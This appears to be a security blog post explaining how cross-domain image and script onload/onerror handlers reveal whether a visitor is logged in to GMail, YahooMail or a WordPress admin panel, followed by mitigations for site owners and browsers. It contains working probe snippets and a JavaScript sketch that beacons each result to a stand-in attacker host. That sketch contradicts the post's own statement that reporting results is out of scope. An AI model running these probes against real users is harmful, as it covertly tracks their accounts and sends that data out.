I’m sure similar URLs can be found on most any website with user accounts. The GMail URL responds with an image when the user is logged-in and HTML when they’re not. The YahooMail URL responds with just a simple HTML comment when logged-in or a large HTML error page when they’re not. The ha.ckers.org URL will only be served if you are logged in as an admin on WordPress; otherwise a forbidden message appears.
The ways the URLs respond are subtly different and require slightly different approaches when applied to Firefox 3 (b3), as we’ll see next.
For GMail, it’s extremely simple.
<* img src="https://mail.google.com/mail/pimages/2/icons_ns1.png" onload="alert('GMail: Logged-In')" onerror="alert('Gmail: Not Logged-in')">
The IMG tag onload event handler fires if a valid image returns while the onerror event handler fires on invalid images (example: receives HTML). Easy boolean logic. Of course additional code is required to send the results back to the server but that’s beyond our scope here.
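To make the boolean logic concrete, here’s a rough sketch of how an attacker might wire the probe up programmatically and beacon the result home. The `REPORT_URL` endpoint and the function names are my own hypothetical additions, not part of the original examples.

```javascript
// Hypothetical attacker-controlled endpoint that collects probe results.
var REPORT_URL = 'http://attacker.example/log';

// Pure helper: build the beacon URL carrying the probe result.
function reportUrl(site, loggedIn) {
  return REPORT_URL + '?site=' + encodeURIComponent(site) +
         '&loggedIn=' + (loggedIn ? '1' : '0');
}

// Create the probe image; onload fires for a real image (logged-in),
// onerror fires when HTML comes back instead (not logged-in). The
// result is sent back via a second image request.
function probe(site, url) {
  var img = new Image();
  img.onload  = function () { (new Image()).src = reportUrl(site, true);  };
  img.onerror = function () { (new Image()).src = reportUrl(site, false); };
  img.src = url;
}

// Guarded so the sketch also loads outside a browser; in a page this
// would fire the GMail probe from the post.
if (typeof Image !== 'undefined') {
  probe('gmail', 'https://mail.google.com/mail/pimages/2/icons_ns1.png');
}
```

The same helper works for any image-based probe; only the URL and the label change.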
The ha.ckers.org case is exactly the same as GMail.
<* img src="http://ha.ckers.org/blog/wp-admin/images/toggle.gif" onload="alert('RSnake: Logged-In')" onerror="alert('RSnake: Not Logged-in')">
The YahooMail example is almost as simple, but has to be implemented a little differently since we’re dealing with only HTML responses and no images.
<* script src="http://us.mg1.mail.yahoo.com/dc/rs?log=SuccessfulLaunch" onload="alert('YahooMail: Logged-in')" onerror="alert('YahooMail: Not Logged-in')"><* /script>
Website owners can do one of two things here:
Remove authentication from the resource if the content isn’t particularly sensitive
Add CSRF-like secret tokens so that the URL is not predictable
At the end of the day though, it’s unlikely that any of these websites, or others with similar issues, will take either step. Even if they did, there are so many other ways to pull off the same attack (timing attacks, monitoring onload events, probing for named iframes, JS console errors, etc.) that the value of fixing this one leak is somewhat limited. I had a long discussion with Chris Evans and Rich Cannings from Google about this particular issue to get their insights.
In our collective opinion, it’s probably not the responsibility of website owners to change their (arguably secure) application behavior to compensate for the browser leaking cross-domain information. Though they still could if they really wanted to. Also, it’s probably a lot easier for the browser vendors to remedy this issue in some clever way than for every website owner to do the above. What do you think?